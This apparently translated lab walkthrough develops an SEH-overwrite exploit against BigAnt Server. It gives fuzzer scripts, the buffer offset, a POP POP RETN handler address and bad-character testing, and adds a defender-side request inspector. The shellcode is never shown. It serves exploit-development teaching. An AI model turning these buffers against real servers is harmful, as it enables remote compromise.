- OllyDbg (debugger)
- BigAnt Server (target application, SEH overwrite)
- Fuzzer
1. Create the fuzzer
Port: 6660
Address: 192.168.56.102 (taken from the BigAnt Server host's IP)
The fuzzer sends a string of "A" characters up to 2500 bytes long.
Run BigAnt Server.
Make sure AntServ is running, then attach OllyDbg to it for debugging.
After attaching to AntServ, run the fuzzer and look at the registers: ESI is filled with "AAAA..." but EIP is not overwritten, yet the application crashes.
This application uses SEH, so open the menu View > SEH chain.
The buffer we sent is clearly visible saved in the SEH chain. To pass the characters through to EIP, press Shift + F9.
After that, use Follow in Dump.
2. Bypass SEH
Search for a POP POP RETN sequence:
View > Executable modules, double-click VBAJET32.DLL
Right click > Search for > Sequence of commands
We find a POP POP RETN.
To find the offset of the SEH overwrite, create a 2500-byte pattern and put it in the fuzzer.
Restart BigAnt Server and OllyDbg and set the breakpoint as in the first step.
Run the fuzzer, check the SEH chain, press F9 to pass the exception to the handler (bypassing SEH), then write down the address in the EIP register.
EIP: 42326742
Use pattern_offset.
Conclusion: we need a 966-byte buffer to reach the SEH handler; edit the fuzzer.
#!/usr/bin/python
# Fuzzer for step 2: filler up to the SEH record, 4 marker bytes that land
# in the next-SEH slot, 4 "A" bytes that overwrite the handler, then padding.
# Bytes literals keep this working under both Python 2 and Python 3.
import socket
target_addres = "192.168.56.102"
target_port = 6660
buffer = b"USV "
buffer += b"\x90" * 962                      # filler before the SEH record
buffer += b"\xCC\xCC\xCC\xCC"                # marker bytes (next-SEH slot)
buffer += b"\x41\x41\x41\x41"                # "AAAA" overwrites the SEH handler
buffer += b"\x90" * (2504 - len(buffer))     # pad to the 2504-byte total
buffer += b"\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_addres, target_port))
sock.send(buffer)
sock.close()
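From the defender's side, the same request shape is what a sensor or the server's own input validation should catch. The following Python 3 function is an added example, not code from the original post and not BigAnt's own code: it inspects a captured "USV " request of the shape the fuzzer above sends and reports why it looks like an overflow attempt. It never connects to anything. The thresholds MAX_ARG_LEN and MIN_RUN and the sample requests are assumptions constructed for this example, not values documented by BigAnt.

```python
# Added example (not from the original post): a defender-side check for
# oversized "USV " requests of the shape the fuzzer sends to TCP port 6660.
# It inspects a captured request; it does not talk to any server.
# MAX_ARG_LEN and MIN_RUN are assumed thresholds chosen for this example.

MAX_ARG_LEN = 256   # assumed sane upper bound for a USV argument
MIN_RUN = 64        # a run of one byte this long looks like filler / a sled
TERMINATOR = b"\r\n\r\n"


def parse_usv(request: bytes):
    """Split a raw request into (command, argument), or return None.

    The request shape shown in the walkthrough is "USV " + data + "\\r\\n\\r\\n".
    """
    if not request.endswith(TERMINATOR):
        return None
    body = request[: -len(TERMINATOR)]
    cmd, sep, arg = body.partition(b" ")
    if not sep:
        return None
    return cmd, arg


def longest_run(data: bytes):
    """Return (byte_value, run_length) for the longest run of one byte."""
    best_byte, best_len = None, 0
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best_len:
            best_byte, best_len = data[i], j - i
        i = j
    return best_byte, best_len


def inspect_request(request: bytes):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    parsed = parse_usv(request)
    if parsed is None:
        findings.append("malformed request (no command separator or terminator)")
        return findings
    cmd, arg = parsed
    if cmd != b"USV":
        return findings  # only the USV command is covered by this check
    if len(arg) > MAX_ARG_LEN:
        findings.append("USV argument is %d bytes (limit %d)" % (len(arg), MAX_ARG_LEN))
    byte, run = longest_run(arg)
    if run >= MIN_RUN:
        findings.append("run of %d x 0x%02x bytes (filler/sled)" % (run, byte))
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if nonprint:
        findings.append("%d non-printable bytes in argument" % nonprint)
    return findings


# Constructed samples: a benign-looking request and one shaped like the
# fuzzer buffer above (NOP filler, 4 marker bytes, 4 address bytes, padding
# to 2504 bytes, then the terminator).
BENIGN = b"USV alice\r\n\r\n"
CRAFTED = b"USV " + b"\x90" * 962 + b"\xCC" * 4 + b"\x41" * 4
CRAFTED += b"\x90" * (2504 - len(CRAFTED)) + TERMINATOR

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, inspect_request(req) or "ok")
```

On the crafted sample this reports three findings (argument length 2500, a 1530-byte run of 0x90, and 2496 non-printable bytes), while the benign request reports nothing; a length limit alone would already reject the fuzzer's buffer, which is the cheapest fix on the server side.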
3. Control the CPU
Note the SEH handler address: 0F9A196A
#!/usr/bin/python
# Fuzzer for step 3: same layout as before, but the 4 bytes in the handler
# slot are now the address 0F9A196A written in little-endian order.
# The original post had the padding line fused onto the comment of the
# SEH line, which left the buffer short; it is split back out here.
import socket
target_addres = "192.168.56.102"
target_port = 6660
buffer = b"USV "
buffer += b"\x90" * 962                      # filler before the SEH record
buffer += b"\xCC\xCC\xCC\xCC"                # marker bytes (next-SEH slot)
buffer += b"\x6A\x19\x9A\x0F"                # SEH overwrite: 0F9A196A, little-endian
buffer += b"\x90" * (2504 - len(buffer))     # pad to the 2504-byte total
buffer += b"\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_addres, target_port))
sock.send(buffer)
sock.close()
Do as in the first step and set the breakpoint,
then debug. We only get 4 bytes of memory here, which is not enough;
we want to find a memory region with more space.
4. Shellcode
Create the payload.
Run the fuzzer.
After running the fuzzer, check the SEH chain:
the SEH handler is not valid.
Remove the payload from the fuzzer and run it again (restart BigAnt Server and OllyDbg first), then check the SEH chain:
the SEH handler is valid.
So we must test the payload line by line to find the bad characters.
Use generatecodes:
root@bt:/opt# perl generatecodes.pl 00,0a,0d
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
"\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
"\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
"\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
"\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
"\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
"\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
"\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
"\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
Restart BigAnt Server and OllyDbg, set the breakpoint.
First line
Second
Third
Finally, we find that \x20 is a bad character.
Add it to the payload generator's exclusion list and put the generated payload into the fuzzer.
Restart OllyDbg and BigAnt Server, set the breakpoint, run the fuzzer.
5. Check for bad characters in the buffer
0x00 0x0a 0x0d 0x40 0x20 0x25
Edit the fuzzer to use the payload.
Run telnet.